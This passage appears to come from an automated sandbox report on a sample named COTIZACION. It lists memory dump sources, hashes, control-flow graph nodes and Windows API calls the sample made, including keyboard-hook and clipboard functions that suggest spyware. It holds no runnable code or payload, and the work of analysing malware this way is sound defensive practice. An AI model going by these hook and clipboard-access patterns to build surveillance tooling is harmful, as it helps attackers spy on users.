                                                                                                • Opcode Fuzzy Hash: 108afe956e0b5e5c0b4706ec2b01d9d10ee7843694a520204e328a638ab39504
                                                                                                • Instruction Fuzzy Hash: 2A221571A04255CFDB25CB68D8807BEBBB2EF85311F1585AAD865DF282C734EC4AC790
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2a8e68dde12672c283417e93e08c2579ad7b74bf6f13aec67b765fcbe3ec365b
                                                                                                • Instruction ID: 5498bc15409745a90d39c7964872e92f614a2d687574e46bfdccec3bfdc938c9
                                                                                                • Opcode Fuzzy Hash: 2a8e68dde12672c283417e93e08c2579ad7b74bf6f13aec67b765fcbe3ec365b
                                                                                                • Instruction Fuzzy Hash: E01265B8E012098BEB14CF68D4D479DB7B2FB49750F608626F41DEB391DA34DD818B91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b9eb83430f1f9edb46574d7aff0cb6ac552bd82b4711fe0664bf908e218d1b23
                                                                                                • Instruction ID: 22949a023da99fa90c9260d1fe422bd9585ee046eee297d1cdba376d03e3a4dd
                                                                                                • Opcode Fuzzy Hash: b9eb83430f1f9edb46574d7aff0cb6ac552bd82b4711fe0664bf908e218d1b23
                                                                                                • Instruction Fuzzy Hash: ED326074E10759CFDB14DBB9C89099DB7B6BFC9300F50C66AD409BB250EB70AA85CB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e8c6efa356bf90fc96377c116949aa25868bf5a0691e721ba9a19e5d8a497860
                                                                                                • Instruction ID: 2f30c26d9f721e32dbca0df2f623fac21942e7b20d06831e5b5fdda16ad32727
                                                                                                • Opcode Fuzzy Hash: e8c6efa356bf90fc96377c116949aa25868bf5a0691e721ba9a19e5d8a497860
                                                                                                • Instruction Fuzzy Hash: E7B16470E00209CFDF14CFA9D8917DDBBF2AF88719F148529D825EB254EB749885CB91

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 3B715F06
                                                                                                • GetCurrentThread.KERNEL32 ref: 3B715F43
                                                                                                • GetCurrentProcess.KERNEL32 ref: 3B715F80
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 3B715FD9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: e51d6436388e4f9f19ed7adbb287e7c90a2490ed052af8a0fd00b27d674583a6
                                                                                                • Instruction ID: 2c4cfe09ba854ad4cb5af3df82e5ec70a8d9dd4f6a42e0cf3774a512c310824a
                                                                                                • Opcode Fuzzy Hash: e51d6436388e4f9f19ed7adbb287e7c90a2490ed052af8a0fd00b27d674583a6
                                                                                                • Instruction Fuzzy Hash: 095189B09017498FDB04CFAAD548B9EBBF1EF49300F20845AE419AB3A1DB749A45CF65

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 3B715F06
                                                                                                • GetCurrentThread.KERNEL32 ref: 3B715F43
                                                                                                • GetCurrentProcess.KERNEL32 ref: 3B715F80
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 3B715FD9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Current$ProcessThread
                                                                                                • String ID:
                                                                                                • API String ID: 2063062207-0
                                                                                                • Opcode ID: 593063d523e84d8bebd5b58ea0e8044b2c3a590c7e39c2535edfd2c1c68b9c49
                                                                                                • Instruction ID: 676d12ef69299909d673a79984fb353e09ac42125a558d156d6b23561520a73a
                                                                                                • Opcode Fuzzy Hash: 593063d523e84d8bebd5b58ea0e8044b2c3a590c7e39c2535edfd2c1c68b9c49
                                                                                                • Instruction Fuzzy Hash: A85147B09017098FDB04CFAAD548B9EBBF5EF88310F20845AE419BB350DB749A45CF65

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 921 154810-15489c 924 1548e6-1548e8 921->924 925 15489e-1548a9 921->925 927 1548ea-154902 924->927 925->924 926 1548ab-1548b7 925->926 928 1548b9-1548c3 926->928 929 1548da-1548e4 926->929 934 154904-15490f 927->934 935 15494c-15494e 927->935 930 1548c5 928->930 931 1548c7-1548d6 928->931 929->927 930->931 931->931 933 1548d8 931->933 933->929 934->935 937 154911-15491d 934->937 936 154950-154995 935->936 945 15499b-1549a9 936->945 938 154940-15494a 937->938 939 15491f-154929 937->939 938->936 941 15492d-15493c 939->941 942 15492b 939->942 941->941 943 15493e 941->943 942->941 943->938 946 1549b2-154a0f 945->946 947 1549ab-1549b1 945->947 954 154a11-154a15 946->954 955 154a1f-154a23 946->955 947->946 954->955 956 154a17-154a1a call 150ab8 954->956 957 154a25-154a29 955->957 958 154a33-154a37 955->958 956->955 957->958 962 154a2b-154a2e call 150ab8 957->962 959 154a47-154a4b 958->959 960 154a39-154a3d 958->960 964 154a4d-154a51 959->964 965 154a5b 959->965 960->959 963 154a3f 960->963 962->958 963->959 964->965 967 154a53 964->967 968 154a5c 965->968 967->965 968->968
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: \VZm$\VZm
                                                                                                • API String ID: 0-2081764631
                                                                                                • Opcode ID: 9aeb4f399d5244437d6a25c2f18b1a7409ffa1e891d512d510d301517a6ab427
                                                                                                • Instruction ID: 39969e59cd6daf859cdb284e760cc378d6aff96557e1193195da754959714e92
                                                                                                • Opcode Fuzzy Hash: 9aeb4f399d5244437d6a25c2f18b1a7409ffa1e891d512d510d301517a6ab427
                                                                                                • Instruction Fuzzy Hash: 63718F70E00249CFDF14CFA9C8857DEBBF1BF88719F148129E825AB254DB749885CB95

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 969 154804-15489c 972 1548e6-1548e8 969->972 973 15489e-1548a9 969->973 975 1548ea-154902 972->975 973->972 974 1548ab-1548b7 973->974 976 1548b9-1548c3 974->976 977 1548da-1548e4 974->977 982 154904-15490f 975->982 983 15494c-15494e 975->983 978 1548c5 976->978 979 1548c7-1548d6 976->979 977->975 978->979 979->979 981 1548d8 979->981 981->977 982->983 985 154911-15491d 982->985 984 154950-154962 983->984 992 154969-154995 984->992 986 154940-15494a 985->986 987 15491f-154929 985->987 986->984 989 15492d-15493c 987->989 990 15492b 987->990 989->989 991 15493e 989->991 990->989 991->986 993 15499b-1549a9 992->993 994 1549b2-154a0f 993->994 995 1549ab-1549b1 993->995 1002 154a11-154a15 994->1002 1003 154a1f-154a23 994->1003 995->994 1002->1003 1004 154a17-154a1a call 150ab8 1002->1004 1005 154a25-154a29 1003->1005 1006 154a33-154a37 1003->1006 1004->1003 1005->1006 1010 154a2b-154a2e call 150ab8 1005->1010 1007 154a47-154a4b 1006->1007 1008 154a39-154a3d 1006->1008 1012 154a4d-154a51 1007->1012 1013 154a5b 1007->1013 1008->1007 1011 154a3f 1008->1011 1010->1006 1011->1007 1012->1013 1015 154a53 1012->1015 1016 154a5c 1013->1016 1015->1013 1016->1016
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: \VZm$\VZm
                                                                                                • API String ID: 0-2081764631
                                                                                                • Opcode ID: e16305a6ba4906d8906ed291bbb20812f8c2817861d583e8be42f069247cde91
                                                                                                • Instruction ID: 0a922cc965fcc97093afad548fa7dc6505f29159bad42d836eefab44bf62387e
                                                                                                • Opcode Fuzzy Hash: e16305a6ba4906d8906ed291bbb20812f8c2817861d583e8be42f069247cde91
                                                                                                • Instruction Fuzzy Hash: 13719D70E00249CFDF14CFA9C8857DEBBF1BF48719F148129E825AB254EB749885CB91

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1250 15ecc8-15ece9 1251 15eceb-15ecee 1250->1251 1252 15ecf0-15ecf7 1251->1252 1253 15ecfc-15ecff 1251->1253 1252->1253 1254 15ed01-15ed1d 1253->1254 1255 15ed22-15ed25 1253->1255 1254->1255 1256 15ed27-15ed35 1255->1256 1257 15ed3a-15ed3d 1255->1257 1256->1257 1258 15ed54-15ed57 1257->1258 1259 15ed3f-15ed49 1257->1259 1261 15ed6f-15ed72 1258->1261 1262 15ed59-15ed6a 1258->1262 1268 15ef63-15ef84 1259->1268 1269 15ed4f 1259->1269 1265 15ed74-15ed77 1261->1265 1266 15edcb-15edcf 1261->1266 1262->1261 1273 15edc6-15edc9 1265->1273 1274 15ed79-15edc1 1265->1274 1271 15edd5 1266->1271 1272 15f100-15f138 1266->1272 1292 15ef89-15ef8c 1268->1292 1269->1258 1275 15edda-15eddd 1271->1275 1305 15f14a 1272->1305 1306 15f13a-15f148 1272->1306 1273->1266 1273->1275 1274->1273 1277 15ee33-15ee36 1275->1277 1278 15eddf-15ee2e 1275->1278 1281 15ee4d-15ee50 1277->1281 1282 15ee38-15ee48 1277->1282 1278->1277 1284 15ee73-15ee76 1281->1284 1285 15ee52-15ee6e 1281->1285 1282->1281 1289 15ee84-15ee87 1284->1289 1290 15ee78-15ee7f 1284->1290 1285->1284 1296 15ee9f-15eea2 1289->1296 1297 15ee89-15ee9a 1289->1297 1290->1289 1293 15efac-15efaf 1292->1293 1294 15ef8e-15efa7 call 157b8c 1292->1294 1301 15efb1-15efc7 1293->1301 1302 15efcc-15efcf 1293->1302 1294->1293 1303 15eea4-15eeb7 1296->1303 1304 15eec2-15eec5 1296->1304 1297->1296 1301->1302 1314 15efd1-15f006 1302->1314 1315 15f00b-15f00d 1302->1315 1303->1252 1311 15eebd 1303->1311 1312 15eec7-15eecc 1304->1312 1313 15eecf-15eed2 1304->1313 1320 15f152-15f164 1305->1320 1306->1320 1311->1304 1312->1313 1318 15eed4-15eedb 1313->1318 1319 15eee6-15eee9 1313->1319 1314->1315 1323 15f014-15f017 1315->1323 1324 15f00f 1315->1324 1318->1272 1329 15eee1 1318->1329 1330 15ef11-15ef14 1319->1330 1331 15eeeb-15ef0c 1319->1331 1348 15f176 1320->1348 1349 15f166-15f174 1320->1349 1323->1251 1325 15f01d-15f02c 1323->1325 1324->1323 1341 15f032-15f0e2 call 157b8c 1325->1341 1342 15f0e8-15f0fd 1325->1342 1329->1319 1333 15ef16-15ef1d 1330->1333 1334 15ef20-15ef23 1330->1334 1331->1330 1339 15ef25-15ef3a 1334->1339 1340 15ef3f-15ef42 1334->1340 1339->1340 1343 15ef44-15ef59 1340->1343 1344 15ef5e-15ef61 1340->1344 1341->1342 1342->1272 1343->1344 1344->1268 1344->1292 1355 15f17e-15f1be 1348->1355 1349->1355 1367 15f1c6-15f1f9 1355->1367 1375 15f206 1367->1375 1376 15f1fb-15f200 1367->1376 1378 15f207 1375->1378 1376->1375 1378->1378
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PJ,q
                                                                                                • API String ID: 0-2306339500
                                                                                                • Opcode ID: 15391cf41e9a07133504bcb6d2a6da54460ee6e12f9bebac04b829e221451bfa
                                                                                                • Instruction ID: fcfde22638df5f184a9a2d55f8cf82f3be1054da256672d2fc32bdc12c459d92
                                                                                                • Opcode Fuzzy Hash: 15391cf41e9a07133504bcb6d2a6da54460ee6e12f9bebac04b829e221451bfa
                                                                                                • Instruction Fuzzy Hash: EAE15B34A00215CFDB28DB68C490AAE7BF2FB89305F244529E816EF395DB35DD4ACB51

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1382 3b71236f-3b7123de 1383 3b7123e0-3b7123e6 1382->1383 1384 3b7123e9-3b7123f0 1382->1384 1383->1384 1385 3b7123f2-3b7123f8 1384->1385 1386 3b7123fb-3b712433 1384->1386 1385->1386 1387 3b71243b-3b71249a CreateWindowExW 1386->1387 1388 3b7124a3-3b7124db 1387->1388 1389 3b71249c-3b7124a2 1387->1389 1393 3b7124e8 1388->1393 1394 3b7124dd-3b7124e0 1388->1394 1389->1388 1395 3b7124e9 1393->1395 1394->1393 1395->1395
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B71248A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateWindow
                                                                                                • String ID:
                                                                                                • API String ID: 716092398-0
                                                                                                • Opcode ID: a2bc7ab690c71050ef2be6d75b8ce4d8b8f82b8b90be225e64c47dda85642166
                                                                                                • Instruction ID: dcf7a19889722c1d9848e48e1c00d3ed1da4fad3a3dc58dd003fa63dd201ac7c
                                                                                                • Opcode Fuzzy Hash: a2bc7ab690c71050ef2be6d75b8ce4d8b8f82b8b90be225e64c47dda85642166
                                                                                                • Instruction Fuzzy Hash: C151B0B5D103499FDB14CF99D880ADEBBB1FF48310F24852AE818BB210D7749845CF90

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1396 3b712378-3b7123de 1397 3b7123e0-3b7123e6 1396->1397 1398 3b7123e9-3b7123f0 1396->1398 1397->1398 1399 3b7123f2-3b7123f8 1398->1399 1400 3b7123fb-3b71249a CreateWindowExW 1398->1400 1399->1400 1402 3b7124a3-3b7124db 1400->1402 1403 3b71249c-3b7124a2 1400->1403 1407 3b7124e8 1402->1407 1408 3b7124dd-3b7124e0 1402->1408 1403->1402 1409 3b7124e9 1407->1409 1408->1407 1409->1409
                                                                                                APIs
                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3B71248A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateWindow
                                                                                                • String ID:
                                                                                                • API String ID: 716092398-0
                                                                                                • Opcode ID: 99f39ccb7f0afdc84536d5eb7b8dc9c72b1ddcd5810cfec044274086d87c9a9a
                                                                                                • Instruction ID: 4e1421837c65bcf64736ad08c9c91467d8fd55667ffccf9983e5af70a8326782
                                                                                                • Opcode Fuzzy Hash: 99f39ccb7f0afdc84536d5eb7b8dc9c72b1ddcd5810cfec044274086d87c9a9a
                                                                                                • Instruction Fuzzy Hash: 3241A2B5D103099FDB14CF99D980ADEBBB5FF48310F24852AE819BB210D7749845CF90

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1410 3b715cbc-3b716fa4 1414 3b717054-3b717074 call 3b71065c 1410->1414 1415 3b716faa-3b716faf 1410->1415 1423 3b717077-3b717084 1414->1423 1416 3b716fb1-3b716fe8 1415->1416 1417 3b717002-3b71703a CallWindowProcW 1415->1417 1424 3b716ff1-3b717000 1416->1424 1425 3b716fea-3b716ff0 1416->1425 1420 3b717043-3b717052 1417->1420 1421 3b71703c-3b717042 1417->1421 1420->1423 1421->1420 1424->1423 1425->1424
                                                                                                APIs
                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 3B717029
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallProcWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2714655100-0
                                                                                                • Opcode ID: 9f40424d8d8c31409456ea950ff67254267ae001691732e3d6bb89ed0647db1f
                                                                                                • Instruction ID: 0827303590b58a4381a709efd7e2e4c2605756606618eec21e5eba86df73c5c8
                                                                                                • Opcode Fuzzy Hash: 9f40424d8d8c31409456ea950ff67254267ae001691732e3d6bb89ed0647db1f
                                                                                                • Instruction Fuzzy Hash: 0E4149B9A00309CFDB10CF99C484AAABBF5FF88314F24C459E519AB321D775A941CFA1

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1428 3b717ca4-3b717d00 1429 3b717d0a-3b717d48 OleGetClipboard 1428->1429 1430 3b717d51-3b717d9f 1429->1430 1431 3b717d4a-3b717d50 1429->1431 1436 3b717da1-3b717da5 1430->1436 1437 3b717daf 1430->1437 1431->1430 1436->1437 1438 3b717da7 1436->1438 1439 3b717db0 1437->1439 1438->1437 1439->1439
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard
                                                                                                • String ID:
                                                                                                • API String ID: 220874293-0
                                                                                                • Opcode ID: 852cebdd24d80c5ed1e84cc204c36b31b852441f11d48744deed882a7c0c65e6
                                                                                                • Instruction ID: a4e9676ae7e65cef7d27735061b513a548ef40509d65c236c73b48b08fa7c17e
                                                                                                • Opcode Fuzzy Hash: 852cebdd24d80c5ed1e84cc204c36b31b852441f11d48744deed882a7c0c65e6
                                                                                                • Instruction Fuzzy Hash: 9B31E1B4A0224DDFEB20CFA9C580BDDBBB1FF48314F208459E444AB294DB74A845CF61

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1440 3b717250-3b717252 1441 3b717254-3b717266 1440->1441 1442 3b71728f-3b7172d9 1440->1442 1443 3b717268-3b71726b 1441->1443 1444 3b7172e1-3b71730c KiUserCallbackDispatcher 1442->1444 1445 3b71727d-3b71727f 1443->1445 1446 3b71726d-3b717270 call 3b715d14 1443->1446 1449 3b717315-3b717329 1444->1449 1450 3b71730e-3b717314 1444->1450 1447 3b717281 1445->1447 1448 3b717286-3b717289 1445->1448 1452 3b717275-3b717278 1446->1452 1447->1448 1448->1443 1453 3b71728b-3b71728d 1448->1453 1450->1449 1452->1445
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B717275), ref: 3B7172FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 518ffdc8714a14b9cae3ff28bf0b58dcdb39201741b6a9c5901f7b91ed455b7e
                                                                                                • Instruction ID: 3f8e2a9e10e96730bf38afac7170744ea90c2145703b0fcc91951a59c791d5a8
                                                                                                • Opcode Fuzzy Hash: 518ffdc8714a14b9cae3ff28bf0b58dcdb39201741b6a9c5901f7b91ed455b7e
                                                                                                • Instruction Fuzzy Hash: F821A0B59043888FDB21CFA9D5817CEBFF4EF46310F14449AE449EB252C334A944CBA1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Clipboard
                                                                                                • String ID:
                                                                                                • API String ID: 220874293-0
                                                                                                • Opcode ID: f5e30d24d0c9adc12846cf3d9d6dbc891aacd43e7d51fab35db66e4acd496131
                                                                                                • Instruction ID: 45ccd1dd8d54c46642f0614fbccc3c90d15169a5eb5b47ae6d878a869938024f
                                                                                                • Opcode Fuzzy Hash: f5e30d24d0c9adc12846cf3d9d6dbc891aacd43e7d51fab35db66e4acd496131
                                                                                                • Instruction Fuzzy Hash: B631EFB490220DDFEB10CF99C984BDEBBF5AF48314F208059E448AB290DB74A845CB65
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B716157
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: c6b6c81eb57778146560d17b15a489eec0ddbf95a6a13e6b65401c75f897398b
                                                                                                • Instruction ID: d7cc55db80ba1d7ecf3966c4afc3865a771727e370ea03d0d6e67ac6d12ac769
                                                                                                • Opcode Fuzzy Hash: c6b6c81eb57778146560d17b15a489eec0ddbf95a6a13e6b65401c75f897398b
                                                                                                • Instruction Fuzzy Hash: 7121E3B59002499FDB10CFAAD984ADEFFF4FB48310F14845AE958A7310D374A950CFA1
                                                                                                APIs
                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3B716157
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: 8b1c4f8d6bdd002dd695734749f13a13ebbb3caf877a7801e815e0c45daf7079
                                                                                                • Instruction ID: 8c206877b1287cb4c6d1277e0ababe4970e6b147a3e601ff7d76317e1d0b39bf
                                                                                                • Opcode Fuzzy Hash: 8b1c4f8d6bdd002dd695734749f13a13ebbb3caf877a7801e815e0c45daf7079
                                                                                                • Instruction Fuzzy Hash: 3C21C4B59002499FDB10CFAAD984ADEFBF5EB48310F14841AE958A7350D374A950CFA5
                                                                                                APIs
                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B71986B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: HookWindows
                                                                                                • String ID:
                                                                                                • API String ID: 2559412058-0
                                                                                                • Opcode ID: 0b7f6e671050d540d1b70e2c401d28bd59e918b9cc26006d34638188a5ed8d9b
                                                                                                • Instruction ID: 3e34d284278a8fd99bea79f77325429b107104049b8566b9cc6b6e77bfd63cfb
                                                                                                • Opcode Fuzzy Hash: 0b7f6e671050d540d1b70e2c401d28bd59e918b9cc26006d34638188a5ed8d9b
                                                                                                • Instruction Fuzzy Hash: A421EFB5D002099FDB14CFAAD944BAEBBF5EB88320F10842AE459A7250D774A945CFA1
                                                                                                APIs
                                                                                                • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 3B71986B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: HookWindows
                                                                                                • String ID:
                                                                                                • API String ID: 2559412058-0
                                                                                                • Opcode ID: f0e9bacf72fc946805f07b209bbd60e64673ee84f9fc46a5288ea5bc9515b595
                                                                                                • Instruction ID: 379003b7b0177ad791c18100a40cb80f345f615ad6a6dd4ce71158a6a03a593f
                                                                                                • Opcode Fuzzy Hash: f0e9bacf72fc946805f07b209bbd60e64673ee84f9fc46a5288ea5bc9515b595
                                                                                                • Instruction Fuzzy Hash: 2C21E0B5D002099FDB14CFAAD944BEEBBF5FF88310F10842AE459A7250C774A945CFA1
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 3B717BBD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize
                                                                                                • String ID:
                                                                                                • API String ID: 2538663250-0
                                                                                                • Opcode ID: 2c5a19836ae60da2fed380ecd6115c9be6ba4c95ff7a259fb1c04a2b73d74475
                                                                                                • Instruction ID: 4acfefb508366d5838f945b6b7dd937d2e7914234d55dae5c1295e2156f44500
                                                                                                • Opcode Fuzzy Hash: 2c5a19836ae60da2fed380ecd6115c9be6ba4c95ff7a259fb1c04a2b73d74475
                                                                                                • Instruction Fuzzy Hash: 531115B5900349CFDB20DF9AD544BDEBBF4EB48320F108459E558A7700D374A940CFA5
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B717275), ref: 3B7172FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 2327a97e17381a55af5f1ad68751664d6663a77bc360625b56ebc645336f5d85
                                                                                                • Instruction ID: 13c7c65e7a7d391d47318056b1136d4485f65fda395121085f6e78b61c8c112e
                                                                                                • Opcode Fuzzy Hash: 2327a97e17381a55af5f1ad68751664d6663a77bc360625b56ebc645336f5d85
                                                                                                • Instruction Fuzzy Hash: 151133B59003488FDB10CF9AD444BDEBBF4EB48324F20841AE918A7240D378A940CFA5
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,3B717275), ref: 3B7172FF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599922726.000000003B710000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B710000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b710000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 671da6973f5acfe5393bb593dae3034cf4e4d2121a2a5a0025ef8bcf4996911b
                                                                                                • Instruction ID: be98b35a55deb421fa9dd423aa174ed14492eafe2b0ebb01b67ca5887bee3b4a
